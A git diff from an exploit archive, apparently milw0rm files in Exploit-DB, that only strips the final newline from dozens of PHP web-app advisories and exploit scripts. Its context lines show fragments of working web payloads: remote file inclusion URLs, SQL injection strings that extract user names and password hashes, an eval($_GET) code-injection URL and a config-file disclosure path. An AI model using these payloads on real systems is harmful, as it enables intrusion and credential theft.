milw0rm.com [2007-08-27] +# milw0rm.com [2007-08-27] \ No newline at end of file diff --git a/platforms/php/webapps/4327.txt b/platforms/php/webapps/4327.txt index 4b8354afb..1df200bbd 100755 --- a/platforms/php/webapps/4327.txt +++ b/platforms/php/webapps/4327.txt @@ -18,4 +18,4 @@ Example: # PS: I still hate the Black-Music-Scene... #################################################################### -# milw0rm.com [2007-08-27] +# milw0rm.com [2007-08-27] \ No newline at end of file diff --git a/platforms/php/webapps/4329.txt b/platforms/php/webapps/4329.txt index 82b42a3d0..fb29b7abb 100755 --- a/platforms/php/webapps/4329.txt +++ b/platforms/php/webapps/4329.txt @@ -42,4 +42,4 @@ White_Sheep for Bugs Hunter; ========================= # notsec.com -# milw0rm.com [2007-08-28] +# milw0rm.com [2007-08-28] \ No newline at end of file diff --git a/platforms/php/webapps/4330.txt b/platforms/php/webapps/4330.txt index 6937e61a2..bc345087b 100755 --- a/platforms/php/webapps/4330.txt +++ b/platforms/php/webapps/4330.txt @@ -32,4 +32,4 @@ Your script should filter metacharacters from user input. Vendor contacted but I'm waiting for reply. -# milw0rm.com [2007-08-28] +# milw0rm.com [2007-08-28] \ No newline at end of file diff --git a/platforms/php/webapps/4331.pl b/platforms/php/webapps/4331.pl index 0e18fb939..ffd36d4f6 100755 --- a/platforms/php/webapps/4331.pl +++ b/platforms/php/webapps/4331.pl @@ -74,4 +74,4 @@ if ($res !~ /noimage.gif/i){ } -# milw0rm.com [2007-08-28] +# milw0rm.com [2007-08-28] \ No newline at end of file diff --git a/platforms/php/webapps/4332.txt b/platforms/php/webapps/4332.txt index ce7bf5c49..b20847a37 100755 --- a/platforms/php/webapps/4332.txt +++ b/platforms/php/webapps/4332.txt @@ -38,4 +38,4 @@ $vwar_root = "./../"; // clean tables -# milw0rm.com [2007-08-28] +# milw0rm.com [2007-08-28] \ No newline at end of file diff --git a/platforms/php/webapps/4333.txt b/platforms/php/webapps/4333.txt index 9421d4518..e87eeee5c 100755 --- a/platforms/php/webapps/4333.txt +++ b/platforms/php/webapps/4333.txt @@ -37,4 +37,4 @@ $vwar_root = "./../"; // clean tables -# milw0rm.com [2007-08-28] +# milw0rm.com [2007-08-28] \ No newline at end of file diff --git a/platforms/php/webapps/4336.txt b/platforms/php/webapps/4336.txt index b6a6fd6a7..e1f59f6e5 100755 --- a/platforms/php/webapps/4336.txt +++ b/platforms/php/webapps/4336.txt @@ -25,4 +25,4 @@ * */ -# milw0rm.com [2007-08-29] +# milw0rm.com [2007-08-29] \ No newline at end of file diff --git a/platforms/php/webapps/4338.pl b/platforms/php/webapps/4338.pl index bb700b24e..78930fee9 100755 --- a/platforms/php/webapps/4338.pl +++ b/platforms/php/webapps/4338.pl @@ -102,4 +102,4 @@ sub istrue2 } } -# milw0rm.com [2007-08-29] +# milw0rm.com [2007-08-29] \ No newline at end of file diff --git a/platforms/php/webapps/4339.txt b/platforms/php/webapps/4339.txt index 0f21adf7c..0582234fc 100755 --- a/platforms/php/webapps/4339.txt +++ b/platforms/php/webapps/4339.txt @@ -32,4 +32,4 @@ Vendor: Contacted and replyed that they are fixing it. -# milw0rm.com [2007-08-29] +# milw0rm.com [2007-08-29] \ No newline at end of file diff --git a/platforms/php/webapps/4340.txt b/platforms/php/webapps/4340.txt index d96895754..80332b3b4 100755 --- a/platforms/php/webapps/4340.txt +++ b/platforms/php/webapps/4340.txt @@ -9,4 +9,4 @@ # Discovered by: GoLd_M = [Mahmood_ali] # Thanx To : Tryag-Team & Asbmay's Group & All My Friends -# milw0rm.com [2007-08-29] +# milw0rm.com [2007-08-29] \ No newline at end of file diff --git a/platforms/php/webapps/4341.txt b/platforms/php/webapps/4341.txt index 46977b85f..9fdf10c09 100755 --- a/platforms/php/webapps/4341.txt +++ b/platforms/php/webapps/4341.txt @@ -110,4 +110,4 @@ while($cmd !~ "q") { $cmd = ; } -# milw0rm.com [2007-08-29] +# milw0rm.com [2007-08-29] \ No newline at end of file diff --git a/platforms/php/webapps/4342.txt b/platforms/php/webapps/4342.txt index 205b6bb61..ffa017bf6 100755 --- a/platforms/php/webapps/4342.txt +++ b/platforms/php/webapps/4342.txt @@ -38,4 +38,4 @@ All notsec.com members; White_Sheep for his Bugs Hunter; ================================= -# milw0rm.com [2007-08-30] +# milw0rm.com [2007-08-30] \ No newline at end of file diff --git a/platforms/php/webapps/4346.pl b/platforms/php/webapps/4346.pl index 3d9e95eb7..13ff30c5c 100755 --- a/platforms/php/webapps/4346.pl +++ b/platforms/php/webapps/4346.pl @@ -63,4 +63,4 @@ exit(); } } -# milw0rm.com [2007-08-31] +# milw0rm.com [2007-08-31] \ No newline at end of file diff --git a/platforms/php/webapps/4349.pl b/platforms/php/webapps/4349.pl index ffd08e316..211af5cb1 100755 --- a/platforms/php/webapps/4349.pl +++ b/platforms/php/webapps/4349.pl @@ -99,4 +99,4 @@ sub istrue2 } } -# milw0rm.com [2007-08-31] +# milw0rm.com [2007-08-31] \ No newline at end of file diff --git a/platforms/php/webapps/4350.php b/platforms/php/webapps/4350.php index a5b6fa604..5e11c53e5 100755 --- a/platforms/php/webapps/4350.php +++ b/platforms/php/webapps/4350.php @@ -209,4 +209,4 @@ function footer(){ footer(); ?> -# milw0rm.com [2007-09-01] +# milw0rm.com [2007-09-01] \ No newline at end of file diff --git a/platforms/php/webapps/4352.txt b/platforms/php/webapps/4352.txt index e59f18e59..a5b5d1010 100755 --- a/platforms/php/webapps/4352.txt +++ b/platforms/php/webapps/4352.txt @@ -56,4 +56,4 @@ exploit : http://somehost/path_to_Weblogicnet/es_desp.php?files_dir=[evilCode] ######################MY Special Girl JUST FOR U Ula######################### ######################################E.O.F################################## -# milw0rm.com [2007-09-02] +# milw0rm.com [2007-09-02] \ No newline at end of file diff --git a/platforms/php/webapps/4353.txt b/platforms/php/webapps/4353.txt index 59969108b..6447f8572 100755 --- a/platforms/php/webapps/4353.txt +++ b/platforms/php/webapps/4353.txt @@ -39,4 +39,4 @@ all member www.kecoak-elektronik.net semua komunitas hacker&security Indonesia Cintailah Bahasa Indonesia -# milw0rm.com [2007-09-02] +# milw0rm.com [2007-09-02] \ No newline at end of file diff --git a/platforms/php/webapps/4356.txt b/platforms/php/webapps/4356.txt index b9ff469f5..9c336f675 100755 --- a/platforms/php/webapps/4356.txt +++ b/platforms/php/webapps/4356.txt @@ -5,4 +5,4 @@ Exploit : senetman/html/index.php?page= Thanks To : #asc, IRC.ASCNET.BIZ -# milw0rm.com [2007-09-03] +# milw0rm.com [2007-09-03] \ No newline at end of file diff --git a/platforms/php/webapps/4358.txt b/platforms/php/webapps/4358.txt index 987624aae..e60a7e970 100755 --- a/platforms/php/webapps/4358.txt +++ b/platforms/php/webapps/4358.txt @@ -71,4 +71,4 @@ __________?????______??????_________________________ ############################################################################################## ############################################################################################## -# milw0rm.com [2007-09-03] +# milw0rm.com [2007-09-03] \ No newline at end of file diff --git a/platforms/php/webapps/436.txt b/platforms/php/webapps/436.txt index e5c5a69c6..6ddfec778 100755 --- a/platforms/php/webapps/436.txt +++ b/platforms/php/webapps/436.txt @@ -25,4 +25,4 @@ E-MAIL:

-# milw0rm.com [2004-09-08] +# milw0rm.com [2004-09-08] \ No newline at end of file diff --git a/platforms/php/webapps/4363.txt b/platforms/php/webapps/4363.txt index 1bf635ce9..c0d21dc5b 100755 --- a/platforms/php/webapps/4363.txt +++ b/platforms/php/webapps/4363.txt @@ -12,4 +12,4 @@ #Miro_Tiger100[at]Hotmail.com -# milw0rm.com [2007-09-04] +# milw0rm.com [2007-09-04] \ No newline at end of file diff --git a/platforms/php/webapps/4365.txt b/platforms/php/webapps/4365.txt index d5d3ec995..007b86b64 100755 --- a/platforms/php/webapps/4365.txt +++ b/platforms/php/webapps/4365.txt @@ -12,4 +12,4 @@ #Miro_Tiger100[at]Hotmail.com -# milw0rm.com [2007-09-05] +# milw0rm.com [2007-09-05] \ No newline at end of file diff --git a/platforms/php/webapps/4368.txt b/platforms/php/webapps/4368.txt index c1eacf1e5..eeb99c862 100755 --- a/platforms/php/webapps/4368.txt +++ b/platforms/php/webapps/4368.txt @@ -21,4 +21,4 @@ http://[target]/[path]/menu.php?functions_file=[SHELL] # Iranian Hackers & Security TEAM # Xmors Digital Network Hacking & Security Team -# milw0rm.com [2007-09-06] +# milw0rm.com [2007-09-06] \ No newline at end of file diff --git a/platforms/php/webapps/4370.txt b/platforms/php/webapps/4370.txt index 712c69161..66d3949a6 100755 --- a/platforms/php/webapps/4370.txt +++ b/platforms/php/webapps/4370.txt @@ -42,4 +42,4 @@ all member www.kecoak-elektronik.net semua komunitas hacker&security Indonesia Cintailah Bahasa Indonesia -# milw0rm.com [2007-09-07] +# milw0rm.com [2007-09-07] \ No newline at end of file diff --git a/platforms/php/webapps/4371.txt b/platforms/php/webapps/4371.txt index 486940033..c89dc5a8b 100755 --- a/platforms/php/webapps/4371.txt +++ b/platforms/php/webapps/4371.txt @@ -32,4 +32,4 @@ all member www.kecoak-elektronik.net semua komunitas hacker&security Indonesia Cintailah Bahasa Indonesia -# milw0rm.com [2007-09-07] +# milw0rm.com [2007-09-07] \ No newline at end of file diff --git a/platforms/php/webapps/4374.txt b/platforms/php/webapps/4374.txt index cc7a62172..6b3a75d9e 100755 --- a/platforms/php/webapps/4374.txt +++ b/platforms/php/webapps/4374.txt @@ -17,4 +17,4 @@ Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org # http://[target]/[path]/lib/header.php?DOC_ROOT=[Shell] --------------------------------------------------------------- -# milw0rm.com [2007-09-07] +# milw0rm.com [2007-09-07] \ No newline at end of file diff --git a/platforms/php/webapps/4376.txt b/platforms/php/webapps/4376.txt index 2fc7f01b4..5eb135667 100755 --- a/platforms/php/webapps/4376.txt +++ b/platforms/php/webapps/4376.txt @@ -49,4 +49,4 @@ all member www.kecoak-elektronik.net semua komunitas hacker&security Indonesia Cintailah Bahasa Indonesia -# milw0rm.com [2007-09-08] +# milw0rm.com [2007-09-08] \ No newline at end of file diff --git a/platforms/php/webapps/4377.txt b/platforms/php/webapps/4377.txt index c821fa968..2af650983 100755 --- a/platforms/php/webapps/4377.txt +++ b/platforms/php/webapps/4377.txt @@ -18,4 +18,4 @@ #Discovered by ThE TiGeR -# milw0rm.com [2007-09-08] +# milw0rm.com [2007-09-08] \ No newline at end of file diff --git a/platforms/php/webapps/4378.htm b/platforms/php/webapps/4378.htm index 7edd86e5d..6443e1a77 100755 --- a/platforms/php/webapps/4378.htm +++ b/platforms/php/webapps/4378.htm @@ -59,4 +59,4 @@ All notsec.com members; r00t for testing; ________________________________________________________ -# milw0rm.com [2007-09-08] +# milw0rm.com [2007-09-08] \ No newline at end of file diff --git a/platforms/php/webapps/4380.txt b/platforms/php/webapps/4380.txt index 064f33f7a..0f54a5b3d 100755 --- a/platforms/php/webapps/4380.txt +++ b/platforms/php/webapps/4380.txt @@ -12,4 +12,4 @@ ************************************************************************************* -# milw0rm.com [2007-09-08] +# milw0rm.com [2007-09-08] \ No newline at end of file diff --git a/platforms/php/webapps/4381.txt b/platforms/php/webapps/4381.txt index e5d901291..e2210c424 100755 --- a/platforms/php/webapps/4381.txt +++ b/platforms/php/webapps/4381.txt @@ -33,4 +33,4 @@ ::Website: http://nnc.unkn0wn.eu or http://www.chilloutzone.eu :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::. -# milw0rm.com [2007-09-08] +# milw0rm.com [2007-09-08] \ No newline at end of file diff --git a/platforms/php/webapps/4382.txt b/platforms/php/webapps/4382.txt index 7d9fe9344..6ac97fb7e 100755 --- a/platforms/php/webapps/4382.txt +++ b/platforms/php/webapps/4382.txt @@ -25,4 +25,4 @@ ::Website: none yet :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::. -# milw0rm.com [2007-09-08] +# milw0rm.com [2007-09-08] \ No newline at end of file diff --git a/platforms/php/webapps/4383.txt b/platforms/php/webapps/4383.txt index 6fdd35e3b..699e53c59 100755 --- a/platforms/php/webapps/4383.txt +++ b/platforms/php/webapps/4383.txt @@ -35,4 +35,4 @@ in path : /components/com_restaurante/img_original/.shell.php.jpg -# milw0rm.com [2007-09-08] +# milw0rm.com [2007-09-08] \ No newline at end of file diff --git a/platforms/php/webapps/4384.txt b/platforms/php/webapps/4384.txt index d609c2f98..af6914deb 100755 --- a/platforms/php/webapps/4384.txt +++ b/platforms/php/webapps/4384.txt @@ -19,4 +19,4 @@ Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org # http://[target]/[path]/source/mod/rss/viewitem.php?Codebase=[Shell] --------------------------------------------------------------- -# milw0rm.com [2007-09-08] +# milw0rm.com [2007-09-08] \ No newline at end of file diff --git a/platforms/php/webapps/4385.txt b/platforms/php/webapps/4385.txt index 5372d2436..43cdfc6db 100755 --- a/platforms/php/webapps/4385.txt +++ b/platforms/php/webapps/4385.txt @@ -72,4 +72,4 @@ all member www.kecoak-elektronik.net semua komunitas hacker&security Indonesia Cintailah Bahasa Indonesia -# milw0rm.com [2007-09-09] +# milw0rm.com [2007-09-09] \ No newline at end of file diff --git a/platforms/php/webapps/4386.txt b/platforms/php/webapps/4386.txt index dfcb60ab7..db43b1970 100755 --- a/platforms/php/webapps/4386.txt +++ b/platforms/php/webapps/4386.txt @@ -97,4 +97,4 @@ No Patch Available This bugs Discover by : k-one A.K.A PUPET (Join our community at irc.indoirc.net #safana) -# milw0rm.com [2007-09-10] +# milw0rm.com [2007-09-10] \ No newline at end of file diff --git a/platforms/php/webapps/4387.txt b/platforms/php/webapps/4387.txt index e81649166..10ea7f17e 100755 --- a/platforms/php/webapps/4387.txt +++ b/platforms/php/webapps/4387.txt @@ -24,4 +24,4 @@ | | ---------------------[ [Qatar Security Team] ]------------------------- -# milw0rm.com [2007-09-10] +# milw0rm.com [2007-09-10] \ No newline at end of file diff --git a/platforms/php/webapps/4390.txt b/platforms/php/webapps/4390.txt index 1827ed10b..178c8bf16 100755 --- a/platforms/php/webapps/4390.txt +++ b/platforms/php/webapps/4390.txt @@ -176,4 +176,4 @@ all member www.kecoak-elektronik.net semua komunitas hacker&security Indonesia Cintailah Bahasa Indonesia -# milw0rm.com [2007-09-10] +# milw0rm.com [2007-09-10] \ No newline at end of file diff --git a/platforms/php/webapps/4395.txt b/platforms/php/webapps/4395.txt index 2f1790cfa..537e732f0 100755 --- a/platforms/php/webapps/4395.txt +++ b/platforms/php/webapps/4395.txt @@ -15,4 +15,4 @@ require("$root_path/inc/functions_email.php"); $mail = new email; ---------------------------------------------- -# milw0rm.com [2007-09-11] +# milw0rm.com [2007-09-11] \ No newline at end of file diff --git a/platforms/php/webapps/4396.txt b/platforms/php/webapps/4396.txt index 226843fb9..2e83d935d 100755 --- a/platforms/php/webapps/4396.txt +++ b/platforms/php/webapps/4396.txt @@ -71,4 +71,4 @@ if (!@include $xcart_dir."/smarty.php") { ## ViVa Debuteam !!! -# milw0rm.com [2007-09-11] +# milw0rm.com [2007-09-11] \ No newline at end of file diff --git a/platforms/php/webapps/4397.rb b/platforms/php/webapps/4397.rb index c2ce162a4..fbc25acb9 100755 --- a/platforms/php/webapps/4397.rb +++ b/platforms/php/webapps/4397.rb @@ -1045,4 +1045,4 @@ if $0 != /666/ end end -# milw0rm.com [2007-09-14] +# milw0rm.com [2007-09-14] \ No newline at end of file diff --git a/platforms/php/webapps/44.pl b/platforms/php/webapps/44.pl index 6535abd26..ff86ed75a 100755 --- a/platforms/php/webapps/44.pl +++ b/platforms/php/webapps/44.pl @@ -133,4 +133,4 @@ return ""; -# milw0rm.com [2003-06-20] +# milw0rm.com [2003-06-20] \ No newline at end of file diff --git a/platforms/php/webapps/4400.txt b/platforms/php/webapps/4400.txt index ae92a99c1..377115561 100755 --- a/platforms/php/webapps/4400.txt +++ b/platforms/php/webapps/4400.txt @@ -30,4 +30,4 @@ you must register first KwsPHP Module ( jeuxflash ) Remote SQL Injection Vulnerability ######################################################################### -# milw0rm.com [2007-09-13] +# milw0rm.com [2007-09-13] \ No newline at end of file diff --git a/platforms/php/webapps/4401.txt b/platforms/php/webapps/4401.txt index 9f8a2dd47..009230d83 100755 --- a/platforms/php/webapps/4401.txt +++ b/platforms/php/webapps/4401.txt @@ -17,4 +17,4 @@ www.site.com/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php? Greets to all Irc.RealWorm.Net #Morgan Users ;) -# milw0rm.com [2007-09-13] +# milw0rm.com [2007-09-13] \ No newline at end of file diff --git a/platforms/php/webapps/4404.txt b/platforms/php/webapps/4404.txt index 80a2b5a3a..98a68dbd9 100755 --- a/platforms/php/webapps/4404.txt +++ b/platforms/php/webapps/4404.txt @@ -32,4 +32,4 @@ skill_delete%5B%5D=484)+UNION+ALL+SELECT+user_name||unix_pw+from+users--%3d1&Mul This will work irrespective of the 'magic_quotes_gpc' php setting. -# milw0rm.com [2007-09-13] +# milw0rm.com [2007-09-13] \ No newline at end of file diff --git a/platforms/php/webapps/4405.txt b/platforms/php/webapps/4405.txt index 2e7420d6c..0d384f944 100755 --- a/platforms/php/webapps/4405.txt +++ b/platforms/php/webapps/4405.txt @@ -32,4 +32,4 @@ About arfis: find your own RFI: http://arfis.wordpress.com/ -# milw0rm.com [2007-09-14] +# milw0rm.com [2007-09-14] \ No newline at end of file diff --git a/platforms/php/webapps/4406.txt b/platforms/php/webapps/4406.txt index 472dd9595..bdbf78a41 100755 --- a/platforms/php/webapps/4406.txt +++ b/platforms/php/webapps/4406.txt @@ -19,4 +19,4 @@ http://[target]/[path]/phpffl/phpffl_webfiles/program_files/livedraft/admin.php? """"""""""""""""""""" -# milw0rm.com [2007-09-14] +# milw0rm.com [2007-09-14] \ No newline at end of file diff --git a/platforms/php/webapps/4407.java b/platforms/php/webapps/4407.java index 70c1ab056..c5c20f9b9 100755 --- a/platforms/php/webapps/4407.java +++ b/platforms/php/webapps/4407.java @@ -93,4 +93,4 @@ public class SqInjection { } } -# milw0rm.com [2007-09-14] +# milw0rm.com [2007-09-14] \ No newline at end of file diff --git a/platforms/php/webapps/4408.pl b/platforms/php/webapps/4408.pl index 70d8b7785..bef0e2138 100755 --- a/platforms/php/webapps/4408.pl +++ b/platforms/php/webapps/4408.pl @@ -92,4 +92,4 @@ Contact................: S4mi[at]LinuxMail.org ); } -# milw0rm.com [2007-09-14] +# milw0rm.com [2007-09-14] \ No newline at end of file diff --git a/platforms/php/webapps/4410.php b/platforms/php/webapps/4410.php index 664abf495..7a327ac3c 100755 --- a/platforms/php/webapps/4410.php +++ b/platforms/php/webapps/4410.php @@ -58,4 +58,4 @@ MD5 Hash: 2eb7401af28ae266360b6028a26cc97a */ ?> -# milw0rm.com [2007-09-14] +# milw0rm.com [2007-09-14] \ No newline at end of file diff --git a/platforms/php/webapps/4411.txt b/platforms/php/webapps/4411.txt index 20104659f..7a933b22e 100755 --- a/platforms/php/webapps/4411.txt +++ b/platforms/php/webapps/4411.txt @@ -89,4 +89,4 @@ $fichier .""; * # Discovered by: GoLd_M # SP.TanX = Tryag.Com & Asb-May.Net & Milw0rm.Com -# milw0rm.com [2007-09-15] +# milw0rm.com [2007-09-15] \ No newline at end of file diff --git a/platforms/php/webapps/4412.pl b/platforms/php/webapps/4412.pl index d219b95eb..fa7c0c2a9 100755 --- a/platforms/php/webapps/4412.pl +++ b/platforms/php/webapps/4412.pl @@ -92,4 +92,4 @@ print q( ); } -# milw0rm.com [2007-09-15] +# milw0rm.com [2007-09-15] \ No newline at end of file diff --git a/platforms/php/webapps/4413.pl b/platforms/php/webapps/4413.pl index a8d9f4169..92e8554a8 100755 --- a/platforms/php/webapps/4413.pl +++ b/platforms/php/webapps/4413.pl @@ -82,4 +82,4 @@ print " [-] Exploit Failed ! \n"; } print "\n#############################################################\n"; -# milw0rm.com [2007-09-15] +# milw0rm.com [2007-09-15] \ No newline at end of file diff --git a/platforms/php/webapps/4414.pl b/platforms/php/webapps/4414.pl index b95bc9d32..1745120aa 100755 --- a/platforms/php/webapps/4414.pl +++ b/platforms/php/webapps/4414.pl @@ -112,4 +112,4 @@ print q( ); } -# milw0rm.com [2007-09-15] +# milw0rm.com [2007-09-15] \ No newline at end of file diff --git a/platforms/php/webapps/4415.txt b/platforms/php/webapps/4415.txt index 06a18c585..7fd3ada74 100755 --- a/platforms/php/webapps/4415.txt +++ b/platforms/php/webapps/4415.txt @@ -15,4 +15,4 @@ http://xxx.net/2007/administrator/components/com_joomlaflashfun/admin.joomlaflas Greets to all Irc.RealWorm.Net #Morgan Users ;) -# milw0rm.com [2007-09-15] +# milw0rm.com [2007-09-15] \ No newline at end of file diff --git a/platforms/php/webapps/4416.txt b/platforms/php/webapps/4416.txt index 56b6128d9..6194efc73 100755 --- a/platforms/php/webapps/4416.txt +++ b/platforms/php/webapps/4416.txt @@ -15,4 +15,4 @@ http://xxx.net/administrator/components/com_joom12pic/admin.joom12pic.php?mosCon Greets to all Irc.RealWorm.Net #Morgan Users ;) -# milw0rm.com [2007-09-16] +# milw0rm.com [2007-09-16] \ No newline at end of file diff --git a/platforms/php/webapps/4417.txt b/platforms/php/webapps/4417.txt index ddba0c308..31bef640f 100755 --- a/platforms/php/webapps/4417.txt +++ b/platforms/php/webapps/4417.txt @@ -55,4 +55,4 @@ Live Example : http://www.simpcms.com/medium/normal/index.php?site=search&keyword=1)'/**/union/**/select/**/0,user(),database(),3,name,5,6/**/from/**/categories/* -# milw0rm.com [2007-09-16] +# milw0rm.com [2007-09-16] \ No newline at end of file diff --git a/platforms/php/webapps/4418.sh b/platforms/php/webapps/4418.sh index bcd78c09b..c7b5a9220 100755 --- a/platforms/php/webapps/4418.sh +++ b/platforms/php/webapps/4418.sh @@ -94,4 +94,4 @@ echo -e "Direct Query URL For Admin Hash:\n"; echo -e ""$password_query_url"\n"; -# milw0rm.com [2007-09-16] +# milw0rm.com [2007-09-16] \ No newline at end of file diff --git a/platforms/php/webapps/4419.php b/platforms/php/webapps/4419.php index b74c59bda..4a15e019a 100755 --- a/platforms/php/webapps/4419.php +++ b/platforms/php/webapps/4419.php @@ -148,4 +148,4 @@ function makedata($modifyvalues=0) { ## EOF ?> -# milw0rm.com [2007-09-17] +# milw0rm.com [2007-09-17] \ No newline at end of file diff --git a/platforms/php/webapps/4421.txt b/platforms/php/webapps/4421.txt index a702015ce..a3ddd481e 100755 --- a/platforms/php/webapps/4421.txt +++ b/platforms/php/webapps/4421.txt @@ -40,4 +40,4 @@ Vuln. code: wbxml/WBXML/Decoder.php & Encoder.php || ======================================================================== # Xmors.Com [2007-09-18] -# milw0rm.com [2007-09-18] +# milw0rm.com [2007-09-18] \ No newline at end of file diff --git a/platforms/php/webapps/4422.txt b/platforms/php/webapps/4422.txt index 94aeb36b8..274946a74 100755 --- a/platforms/php/webapps/4422.txt +++ b/platforms/php/webapps/4422.txt @@ -23,4 +23,4 @@ http://server.com/Path/index.php?mod=sondages&do=results&id=-1%20union%20select% KwsPHP 1.0 sondages Module Remote SQL Injection Exploit ######################################################################### -# milw0rm.com [2007-09-18] +# milw0rm.com [2007-09-18] \ No newline at end of file diff --git a/platforms/php/webapps/4423.txt b/platforms/php/webapps/4423.txt index 966450883..072e0e518 100755 --- a/platforms/php/webapps/4423.txt +++ b/platforms/php/webapps/4423.txt @@ -8,4 +8,4 @@ dork: inurl: modifyform.html?code= thanks: str0ke, d3hydr8 -# milw0rm.com [2007-09-18] +# milw0rm.com [2007-09-18] \ No newline at end of file diff --git a/platforms/php/webapps/4425.pl b/platforms/php/webapps/4425.pl index 72d7531cc..9501a2519 100755 --- a/platforms/php/webapps/4425.pl +++ b/platforms/php/webapps/4425.pl @@ -100,4 +100,4 @@ print "Attacco Terminato\n\n"; system("pause"); -# milw0rm.com [2007-09-18] +# milw0rm.com [2007-09-18] \ No newline at end of file diff --git a/platforms/php/webapps/4430.txt b/platforms/php/webapps/4430.txt index ba0ea6071..f4f9e3e29 100755 --- a/platforms/php/webapps/4430.txt +++ b/platforms/php/webapps/4430.txt @@ -22,4 +22,4 @@ DoRk: :( shadowcrew@hotmail.co.uk -# milw0rm.com [2007-09-19] +# milw0rm.com [2007-09-19] \ No newline at end of file diff --git a/platforms/php/webapps/4433.pl b/platforms/php/webapps/4433.pl index 8081a2ef5..dfda258e5 100755 --- a/platforms/php/webapps/4433.pl +++ b/platforms/php/webapps/4433.pl @@ -47,4 +47,4 @@ sub exploit } } -# milw0rm.com [2007-09-19] +# milw0rm.com [2007-09-19] \ No newline at end of file diff --git a/platforms/php/webapps/4434.txt b/platforms/php/webapps/4434.txt index 9c4babaac..e6727610a 100755 --- a/platforms/php/webapps/4434.txt +++ b/platforms/php/webapps/4434.txt @@ -10,4 +10,4 @@ _main_album.php Exploit : http://[PHPPLUS]/language/lang_german/lang_main_album.php?phpbb_root_path=[ http://shell.txt]?a= -# milw0rm.com [2007-09-20] +# milw0rm.com [2007-09-20] \ No newline at end of file diff --git a/platforms/php/webapps/4435.pl b/platforms/php/webapps/4435.pl index 04b4b63c6..5be27070f 100755 --- a/platforms/php/webapps/4435.pl +++ b/platforms/php/webapps/4435.pl @@ -103,4 +103,4 @@ sub usage() { exit; } -# milw0rm.com [2007-09-20] +# milw0rm.com [2007-09-20] \ No newline at end of file diff --git a/platforms/php/webapps/4436.pl b/platforms/php/webapps/4436.pl index c186c68b6..ef232c98a 100755 --- a/platforms/php/webapps/4436.pl +++ b/platforms/php/webapps/4436.pl @@ -130,4 +130,4 @@ sub usage() { exit; } -# milw0rm.com [2007-09-20] +# milw0rm.com [2007-09-20] \ No newline at end of file diff --git a/platforms/php/webapps/4439.txt b/platforms/php/webapps/4439.txt index 7a96d601c..f1c355380 100755 --- a/platforms/php/webapps/4439.txt +++ b/platforms/php/webapps/4439.txt @@ -23,4 +23,4 @@ http://[TARGET]/[PATH]/index.php?q=[Local File]%00 +---------------------------------------------------------------------------------------------+ -# milw0rm.com [2007-09-21] +# milw0rm.com [2007-09-21] \ No newline at end of file diff --git a/platforms/php/webapps/4440.txt b/platforms/php/webapps/4440.txt index a3ea903fb..95203762b 100755 --- a/platforms/php/webapps/4440.txt +++ b/platforms/php/webapps/4440.txt @@ -25,4 +25,4 @@ Mr.HaCkEr, Mr-m07, Al-Shikh, ThE WhitE WolF, HuRrIcAnE, S0m.Ph, KEENEST, HamzaBX Medo Hacker, rUn-vIrUs, Dr.eXe, zAx AND ALL FRIENDS -# milw0rm.com [2007-09-21] +# milw0rm.com [2007-09-21] \ No newline at end of file diff --git a/platforms/php/webapps/4441.txt b/platforms/php/webapps/4441.txt index 242a91efd..a5973ca92 100755 --- a/platforms/php/webapps/4441.txt +++ b/platforms/php/webapps/4441.txt @@ -25,4 +25,4 @@ # remote file disclosure: http://[site]/[path]/include/tinymce/tiny_mce_gzip.php?theme=../../config.php%00 -# milw0rm.com [2007-09-21] +# milw0rm.com [2007-09-21] \ No newline at end of file diff --git a/platforms/php/webapps/4442.txt b/platforms/php/webapps/4442.txt index 0d5966124..e7bd55607 100755 --- a/platforms/php/webapps/4442.txt +++ b/platforms/php/webapps/4442.txt @@ -22,4 +22,4 @@ http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=phpinfo(); http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=[ PHPCODE ] -# milw0rm.com [2007-09-21] +# milw0rm.com [2007-09-21] \ No newline at end of file diff --git a/platforms/php/webapps/4443.txt b/platforms/php/webapps/4443.txt index ce326d790..6c47502e3 100755 --- a/platforms/php/webapps/4443.txt +++ b/platforms/php/webapps/4443.txt @@ -39,4 +39,4 @@ ll%20FROM%20cs_users/* White_Sheep for his Bugs Hunter; ================================= -# milw0rm.com [2007-09-22] +# milw0rm.com [2007-09-22] \ No newline at end of file diff --git a/platforms/php/webapps/4444.txt b/platforms/php/webapps/4444.txt index 2823761ed..56c3e8455 100755 --- a/platforms/php/webapps/4444.txt +++ b/platforms/php/webapps/4444.txt @@ -43,4 +43,4 @@ thanx : shoot3r , Devil-X ,ReMOTeR , and all sniper members contact-mail : SecReT@SecuRitY.Com.Sa -# milw0rm.com [2007-09-22] +# milw0rm.com [2007-09-22] \ No newline at end of file diff --git a/platforms/php/webapps/4446.txt b/platforms/php/webapps/4446.txt index 63c0609e4..f6bdd60b2 100755 --- a/platforms/php/webapps/4446.txt +++ b/platforms/php/webapps/4446.txt @@ -22,4 +22,4 @@ by: ShockShadow Thanks to: Mr-m07, Al-Shikh, ThE WhitE WolF, HuRrIcAnE, S0m.Ph, KEENEST, Qanas Alyahood, Falcon Hammdan, ArabHacker AND ALL FRIENDS -# milw0rm.com [2007-09-23] +# milw0rm.com [2007-09-23] \ No newline at end of file diff --git a/platforms/php/webapps/4447.txt b/platforms/php/webapps/4447.txt index 7ac87d024..864344803 100755 --- a/platforms/php/webapps/4447.txt +++ b/platforms/php/webapps/4447.txt @@ -16,4 +16,4 @@ # Greetings 2 : str0ke - Dr.2 - AsbMay's Group - GoLd_M - KuWaiT SeCuriTy -# milw0rm.com [2007-09-23] +# milw0rm.com [2007-09-23] \ No newline at end of file diff --git a/platforms/php/webapps/4448.txt b/platforms/php/webapps/4448.txt index 952a7b377..00ec0c549 100755 --- a/platforms/php/webapps/4448.txt +++ b/platforms/php/webapps/4448.txt @@ -18,4 +18,4 @@ # POC : /show.php?file=Ev!L C0D3 # ########################################################################## -# milw0rm.com [2007-09-23] +# milw0rm.com [2007-09-23] \ No newline at end of file diff --git a/platforms/php/webapps/4449.txt b/platforms/php/webapps/4449.txt index 700aba212..81c0a88cb 100755 --- a/platforms/php/webapps/4449.txt +++ b/platforms/php/webapps/4449.txt @@ 